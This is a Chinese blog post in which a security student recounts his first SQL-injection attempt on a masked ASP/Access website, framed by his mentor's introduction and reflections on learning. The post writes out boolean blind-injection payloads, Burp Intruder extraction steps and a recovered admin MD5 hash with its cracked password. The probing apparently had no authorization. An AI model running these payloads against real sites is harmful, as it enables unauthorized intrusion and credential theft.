原创 | 我的第一篇渗透。。。。。

sandalwood

原文链接：原创 | 我的第一篇渗透。。。。。

开篇语：这是船山院士网络安全团队学员、团队主力成员QJJ的分享，能碰到一个好的徒弟也不容易，几个月前，他找到我，想学网络安全相关的课程，说在某培训机构交了好几千，连个CTF题目都没办法输出。和我聊了很久，QJJ是个非常实诚的孩子，农村长大，靠自己的努力考上了大学，家境属于靠自己的努力，才能有未来的那种，和很多咨询一下学费就闪的人强很多，一直以来有很多人咨询我，第一句就是：学费多少？我出于礼貌认真答复每一位咨询的人，详细课程的内容和将来的福利，然后，就然后，没有下文了。我常常说，人有三种境界：见识、态度、格局。很多人想学，想学以后就没有了，聪明的人很多，但是这个世界真正努力的人很少。QJJ属于努力的那种，我希望他在奇安信的实习中，能够收获更多的实战工作经验，为明年的高薪就业打下坚实的基础，预祝学有所成！一起努力，未来可期！     ——师父：小浪

当场语塞，学习网安这么久，确实是一篇文章没有写过。属实是有点垃圾，写不出来什么比较好的文章，但是在师父的邀(yin)请(wei)下不得不输出一篇了。

在五分钟中前我准备写一篇关于信息收集的文章，但是网上一搜一大堆而且信息收集涉及的内容、工具、工具的使用等太多了，过于麻烦，所以我的第一篇文章我还是准备水一下。

首先，先感谢团队xu哥的赞助。

在某搜索引擎和某歌上面搜了一天也没有找到一个我可以操作的站，最最主要的还是我的技术不到位。所以接下来就对文档中的网站进行操作。

http://xxx.com/about.asp?id=51and 1=1

http://xxx.com/about.asp?id=51 and 1=2

直接sqlmap一把梭了

幸亏跑了一下 access数据库，一开始以为是mysql数据库，但是后面才反应过来asp站一般都是access数据库

还是手注，不然没截图了，先试一下order by

http://xxx.com/about.asp?id=51 order by 3

发现不管order by 什么都是一样果断放弃 order by，试试布尔盲注

测表名

尝试有没有admin表（一般情况都有）

http://xxx.com/about.asp?id=51and exists (select * from admin)

测字段名

http://xxx.com/about.asp?id=51 and exists (select username from admin)

显然没有username，换name试一下

有name字段

这里测试到最后发现nama一文不值，后发现还有admin_name字段，那admin_pass字段也有了

测字段长度

http://xxx.com/about.asp?id=51 and (select top 1 len(name) from admin)=4

测数据

这里我们使用bp

•          抓到包后CTRL+I 发动到intruder模块

•          选择这个Cluster bomb

•          设置成图下（意思就是让选中的字段进行递归增加）

•          设置payloads

•          右上角 start attack，等待结果

因为他是ascii码要转成字符串

http://tools.bugscaner.com/ascii.html

同样的操作得到admin_pass

md5加密：a11e1027cf07d7a5398e3524744fd918

解密：88619895

找后台,然后登录后台

没照片，因为没找到后台

写在后面

这篇文章是我的第一篇文章，在大佬们面前只是一篇很简单的文章。虽然操作上面是比较简单，简单到直接可以一把梭，我还是尝试手注。那我们有没有真正考虑到一个问题，如果我们连最基本的手注都不会，那我们的基础是可以有多差呢。一味的追求工具带来的快感是不好的，我们更应该去深入的了解sql注入的原理，而不是根据某搜索引擎，某歌的搜索方法去找到一个网站后，直接就上工具。那个样子我们就会变得很迷茫，当你长时间这样的去挖洞。我们也会慢慢的麻木，虽然获得了短暂的快感，感觉自己可以了，久而久之你就会麻木。会感觉没意思，所以我觉得更应该追究其原理，而非那短暂的快感！师父常常给我们说，实践决定你是否入门？理论决定你走多远？掌握原理，才能事半功倍，谁不想成为技术大神呢！

我其实是计科专业，对于网络安全，我还是不够了解。网络安全涉及的学科太多，网络工程、编程语言、计算机原理、社工、操作系统、数据库、大数据、云计算、区块链、IOT、物联网、逆向等等。其实想想也已经过去二三年了，对于网络安全我是一直在学习努力中，不知道对于在读的你现在是否和我一样呢！我的安全之路开始于一部叫《whoami》的电影。这部电影让我知道了什么是网络安全？什么是黑客？那天是2019年3月17日。看完之后，我就和我的室友交流，直言：hacker很牛、很帅、很酷，室友看出我对这个方向的兴趣，随机淘宝下单hacker从入门到入yu。真的是八块钱起家。要说一把梭我2019年就会了。但是到现在2022年我还是感觉一事无成，啥也没有学会，纯纯小白。去年我决定报个培训机构的班，有老师带着也是学习的捷径之一嘛。但种种原因啊，反正学完之后，不能说毫无收获。准确的来说和我八块钱买的课程差不多。这波真的是血亏，所以奉劝大家要是真的想报班，就找一个靠谱一点的。

2021年12月的时候，认识了我现在的老师，也是大家深知的浪师父。大家应该很了解了吧，浪师父干了二十多年的开发。听到之后我人都傻了一半。可能有人要说开发dog了，我也想说，但这完完全全是嫉妒之后的不当言语。确实是非常的崇拜啊。我在浪师父这里学习的是网络安全，当然浪师父也教我们开发，也和我们分享他读过的书，做过的事，认识过的人，走过的弯路。在浪师父这里，他把我们当做一辈子的好兄弟。可惜啊，我太阿斗了，属实是扶不起来。但是认识浪师父是我这一生的转折吧！确实没有人会这么的关注我。就比如说这次的实习工作也是我们浪师父给安排的，当然也是不差的，确实也不方便透露，不然我肯定要“骄傲”一下。路需要我们踏踏实实的去走，戒骄戒躁。浪师父对团队里面所有人都很关注的，比如少客联盟CEO—xu哥，高冷帅气的kuan哥、未来的将军bo哥、大器晚成的fu哥等等，还有很多人。由于我实力还是偏弱，团队的事情一般都是浪师父去处理。也是默默的叹口气啊！所以大家还是要多加油啊，只有自己的实力足够强大的时候，说话才够硬气！

最后感谢大家，看完了我第一篇的文章。要是有足够的能力我后面会有好的文章带给大家，谢谢！